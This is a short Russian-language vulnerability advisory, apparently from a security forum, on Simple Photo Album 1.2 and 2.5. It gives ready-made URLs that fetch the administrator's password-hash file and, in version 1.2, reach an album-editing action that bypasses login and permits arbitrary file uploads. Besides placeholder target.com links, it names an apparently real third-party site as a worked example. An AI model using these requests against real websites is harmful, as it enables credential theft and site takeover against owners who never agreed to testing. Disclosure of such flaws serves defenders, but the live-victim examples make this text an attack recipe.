Программа: Simple Photo Album - 1.2 и 2.5 

Нападающий может получить файл с хешем администратора Simple Photo Album в 1.2 и 2.5,
отредактировать фотоальбом в обход авторизации,
загрузить произвольные файлы - версия 1.2.

Обнаружено: discovered by durito [damagelab] -durito[at]mail[dot]ru- 
HTTP: durito.narod.ru 
www.damagelab.org 

Получение удаленным пользователем файла с хешем администратора Simple Photo Album в 1.2 и 2.5. 

http://target.com/Simple Photo Album/albums/pwd.txt 

Возможность редактирования фотоальбома в обход авторизации, загрузка произвольных файлов - только версия 1.2 

http://target.com/Simple Photo Album/index.php?action=editAlbum&displayAlbumName=[имя_фотоальбома] 

Примеры: 

http://www.keebonk.ch/pix/albums/pwd.txt 
http://www.keebonk.ch/pix/index.php?action=editAlbum&displayAlbumName=set9

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии